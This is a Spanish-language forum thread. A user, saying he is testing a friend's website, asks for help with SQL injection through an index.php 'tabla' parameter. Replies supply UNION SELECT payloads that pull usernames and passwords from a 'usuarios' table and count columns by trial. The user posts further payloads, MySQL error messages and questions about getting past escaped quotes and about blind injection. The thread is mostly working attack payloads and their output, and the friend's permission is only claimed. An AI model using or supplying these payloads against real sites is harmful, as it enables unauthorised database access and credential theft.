buenas! un amigo me dijo esta haciendo una web y me dijo que mirase las vulnerabilidades, le dije que no sabia mucho pero que lo intentaria asique bueno..
hasta el momento no me habia puesto a investigar sobre inyecciones sql y creo que es buen momento el caso es que he estado probando en el documento .php del login y no he encontrado nada pero luego he probado en otro y he obtenido mejores resultados.

uno de los apartados me lleva a esta url
http://www.web.com/index.php?tabla=obranueva

entonces se me a ocurrido probar a ver si existe la tabla usuarios
http://www.web.com/index.php?tabla=usuarios

y perfecto parece que esta esta tabla existe, pero por la consulta sql me da este error.
.

MySQL Error: Unknown column 'nombre' in 'field list'


entonces pongo el tipico 1=1 a ver si hay inyeccion
http://www.web.com/index.php?tabla=usuarios AND 1=1

y recibo este error

DB Error
MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and 1=1 order by hoy DESC LIMIT 0, 4' at line 1


por lo que calculo que la sentencia para la consulta es algo asi como
select * from tabla order by hoy DESC LIMIT 0, 4'

he probado a poner
AND 1=1--
AND 1=1;
'AND 1=1--
'AND 1=1;
y mil cosas mas pero siempre obtengo ese error.

estoy bastante atrapado

alguna pista? que se me escapa?

mmm supongo hacen:

SELECT nombre,demas FROM <inyeccion aqui>

intenta:

obranueva UNION SELECT username,password,1,2,3,4 FROM usuarios /*

cambia:
username,password,1,2,3,4

por los nombres de las columnas y la cantidad de columnas correcta

Prueba con:

obranueva UNION SELECT 1 FROM usuarios
obranueva UNION SELECT 1,1 FROM usuarios
obranueva UNION SELECT 1,1,1 FROM usuarios
obranueva UNION SELECT 1,1,1,1 FROM usuarios
obranueva UNION SELECT 1,1,1,1,1 FROM usuarios

Quizas hay menos columnas que las que has probado.

Cuando des con el numero de campos, lo más probable es que veas 1's en lugares donde había datos en la web.

Entonces te tocará encontrar el nombre de los campos...

Saludos.

estoy haciendo esto siguiendo esta pagina
http://www.seguridad-informatica.cl/home/tutorial-inyeccion-sql-basada-en-errores

he encontrado 2 columnas mas probando, pero me faltan otras 8.

lo que estoy intentando ahora es comprobar la existencia de el usuario invitado.
se que existe por tanto pongo

UNION SELECT MIN(usuario),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios WHERE usuario LIKE 'invitado' --

y me devuelve
MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'invitado\' -- order by hoy DESC LIMIT 0, 4' at line 1

si meto
UNION SELECT MIN(usuario),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios WHERE usuario > 'a' --

MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a\' -- order by hoy DESC LIMIT 0, 4' at line 1


es decir, siempre se queja de las comillas.no se como evitarlo.

osea que no puedo hacer otra cosa? resultados no me muestra.solo es error o no error. asique todo es por blind sql.me equivoco?
ok, he investigado sobre las magic quotes,no sabia lo que eran.
entonces si no puedo poner comillas...

asique tengo que averiguar todas las columnas no?o no es necesario?

al poner
obranueva UNION SELECT usuario,pass,1,1,1,1,1,1,1,1,1,1 FROM usuarios /*
no da error.
si pongo
UNION SELECT MIN(usuario),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios WHERE usuario LIKE pass --
y tampoco me da error
eso me confirma que hay un usuario con el mismo nombre y contraseña no? invitado/invitado

lo que no alcanzo a entender es como dar con el nombre de los usuarios si no puedo poner comillas